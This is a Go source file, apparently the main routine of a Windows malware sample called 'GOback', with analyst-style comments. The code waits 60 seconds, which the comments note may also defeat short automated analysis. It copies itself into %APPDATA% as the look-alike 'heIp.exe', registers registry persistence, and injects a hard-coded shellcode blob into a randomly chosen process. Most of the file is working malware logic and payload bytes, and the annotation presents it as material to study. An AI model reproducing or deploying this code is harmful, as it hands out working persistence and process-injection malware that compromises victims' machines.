package main
import (
"log"
"math/rand"
"os"
"GOback/actions"
"GOback/helpers"
"time"
)
// main is the entry point of this sample. As written it (1) sleeps for a
// fixed delay, (2) copies its own executable into %APPDATA% under a
// look-alike name and registers it for persistence through the project's
// helpers package, then (3) picks a random process ID and hands a
// hard-coded byte blob to actions.InjectShellCode for that PID.
//
// Analyst notes (what is observable from this file alone):
//   - On-disk artifact: a file named "heIp.exe" (capital I, not lowercase
//     L — a visual look-alike for "help.exe") in the %APPDATA% directory.
//   - Persistence: helpers.AddRegistery / helpers.CheckRegistery are
//     called; the exact registry key they touch is defined in the helpers
//     package, which is not part of this listing.
//   - Process injection: actions.InjectShellCode is called with the byte
//     array below and a PID chosen by rand.Intn; the injection technique
//     lives in the actions package, not here.
//   - The payload bytes are an opaque blob; what they do cannot be
//     determined from this listing.
func main() {
	// Fixed 60-second delay before any activity. Besides the author's stated
	// reason (waiting for the desktop to finish loading), a startup delay of
	// this length also means short-lived automated analysis may observe
	// nothing — hedged, since the author only states the first motive.
	time.Sleep(60 * time.Second) //Program should wait some amount of time till windows open completely
	// Error from os.Executable is discarded; on failure exePath would be
	// empty and the copy below would operate on "".
	exePath, _ := os.Executable()
	// Destination is built from the APPDATA environment variable with a
	// hard-coded backslash separator, i.e. Windows-only.
	destinationPath := os.Getenv("APPDATA")
	destinationPath += "\\heIp.exe" // note the capital "I" in "heIp"
	// First-run check: only the existence of the destination file is tested.
	_, err := os.Stat(destinationPath)
	if os.IsNotExist(err) {
		// Not yet installed: copy this binary to APPDATA and register it.
		// CopyFile's first return value is discarded here.
		_, err := helpers.CopyFile(exePath, destinationPath)
		if err != nil {
			// A failed copy aborts the whole run via log.Fatal.
			log.Fatal(err)
		}
		// AddRegistery's return value (if any) is ignored.
		helpers.AddRegistery(destinationPath)
	} else {
		// Already installed: re-register only if CheckRegistery reports a
		// problem (a non-nil value). What it checks is defined in helpers.
		if helpers.CheckRegistery() != nil {
			helpers.AddRegistery(destinationPath)
		}
	}
	// Seed the (legacy, pre-1.20 style) global math/rand source so the
	// process choice below differs between runs.
	rand.Seed(time.Now().UnixNano())
	// GetAllProcesses returns a slice of PIDs; the author's comment says
	// these are 32-bit processes — that filtering, if any, happens in the
	// actions package and is not verifiable here.
	pidArray := actions.GetAllProcesses() // In this line, 32 bit processes' pids in infected machine is obtained as array.
	if len(pidArray) != 0 {
		// rand.Intn(len) yields an index in [0, len), so pidArray[targetPid]
		// is always in range when this branch is taken.
		targetPid := rand.Intn(len(pidArray)) // Random process is selecting for injection.
		// Hard-coded payload bytes. Treated here as an opaque blob; nothing
		// in this file reveals what they do when executed.
		shellcode := []byte{
			0xb8, 0x71, 0xb3, 0xd2, 0xe3, 0xdd, 0xc1, 0xd9, 0x74, 0x24, 0xf4, 0x5d, 0x2b, 0xc9, 0xb1,
			0x52, 0x83, 0xed, 0xfc, 0x31, 0x45, 0x0e, 0x03, 0x34, 0xbd, 0x30, 0x16, 0x4a, 0x29, 0x36,
			0xd9, 0xb2, 0xaa, 0x57, 0x53, 0x57, 0x9b, 0x57, 0x07, 0x1c, 0x8c, 0x67, 0x43, 0x70, 0x21,
			0x03, 0x01, 0x60, 0xb2, 0x61, 0x8e, 0x87, 0x73, 0xcf, 0xe8, 0xa6, 0x84, 0x7c, 0xc8, 0xa9,
			0x06, 0x7f, 0x1d, 0x09, 0x36, 0xb0, 0x50, 0x48, 0x7f, 0xad, 0x99, 0x18, 0x28, 0xb9, 0x0c,
			0x8c, 0x5d, 0xf7, 0x8c, 0x27, 0x2d, 0x19, 0x95, 0xd4, 0xe6, 0x18, 0xb4, 0x4b, 0x7c, 0x43,
			0x16, 0x6a, 0x51, 0xff, 0x1f, 0x74, 0xb6, 0x3a, 0xe9, 0x0f, 0x0c, 0xb0, 0xe8, 0xd9, 0x5c,
			0x39, 0x46, 0x24, 0x51, 0xc8, 0x96, 0x61, 0x56, 0x33, 0xed, 0x9b, 0xa4, 0xce, 0xf6, 0x58,
			0xd6, 0x14, 0x72, 0x7a, 0x70, 0xde, 0x24, 0xa6, 0x80, 0x33, 0xb2, 0x2d, 0x8e, 0xf8, 0xb0,
			0x69, 0x93, 0xff, 0x15, 0x02, 0xaf, 0x74, 0x98, 0xc4, 0x39, 0xce, 0xbf, 0xc0, 0x62, 0x94,
			0xde, 0x51, 0xcf, 0x7b, 0xde, 0x81, 0xb0, 0x24, 0x7a, 0xca, 0x5d, 0x30, 0xf7, 0x91, 0x09,
			0xf5, 0x3a, 0x29, 0xca, 0x91, 0x4d, 0x5a, 0xf8, 0x3e, 0xe6, 0xf4, 0xb0, 0xb7, 0x20, 0x03,
			0xb6, 0xed, 0x95, 0x9b, 0x49, 0x0e, 0xe6, 0xb2, 0x8d, 0x5a, 0xb6, 0xac, 0x24, 0xe3, 0x5d,
			0x2c, 0xc8, 0x36, 0xf1, 0x7c, 0x66, 0xe9, 0xb2, 0x2c, 0xc6, 0x59, 0x5b, 0x26, 0xc9, 0x86,
			0x7b, 0x49, 0x03, 0xaf, 0x16, 0xb0, 0xc4, 0x10, 0x4e, 0x28, 0xb1, 0xf9, 0x8d, 0x4c, 0xbf,
			0x54, 0x18, 0xaa, 0xd5, 0xb6, 0x4d, 0x65, 0x42, 0x2e, 0xd4, 0xfd, 0xf3, 0xaf, 0xc2, 0x78,
			0x33, 0x3b, 0xe1, 0x7d, 0xfa, 0xcc, 0x8c, 0x6d, 0x6b, 0x3d, 0xdb, 0xcf, 0x3a, 0x42, 0xf1,
			0x67, 0xa0, 0xd1, 0x9e, 0x77, 0xaf, 0xc9, 0x08, 0x20, 0xf8, 0x3c, 0x41, 0xa4, 0x14, 0x66,
			0xfb, 0xda, 0xe4, 0xfe, 0xc4, 0x5e, 0x33, 0xc3, 0xcb, 0x5f, 0xb6, 0x7f, 0xe8, 0x4f, 0x0e,
			0x7f, 0xb4, 0x3b, 0xde, 0xd6, 0x62, 0x95, 0x98, 0x80, 0xc4, 0x4f, 0x73, 0x7e, 0x8f, 0x07,
			0x02, 0x4c, 0x10, 0x51, 0x0b, 0x99, 0xe6, 0xbd, 0xba, 0x74, 0xbf, 0xc2, 0x73, 0x11, 0x37,
			0xbb, 0x69, 0x81, 0xb8, 0x16, 0x2a, 0xb1, 0xf2, 0x3a, 0x1b, 0x5a, 0x5b, 0xaf, 0x19, 0x07,
			0x5c, 0x1a, 0x5d, 0x3e, 0xdf, 0xae, 0x1e, 0xc5, 0xff, 0xdb, 0x1b, 0x81, 0x47, 0x30, 0x56,
			0x9a, 0x2d, 0x36, 0xc5, 0x9b, 0x67}
		// Hand the blob and the chosen PID to the actions package. Any
		// result or error from InjectShellCode is not checked here.
		actions.InjectShellCode(shellcode, pidArray[targetPid])
	}
}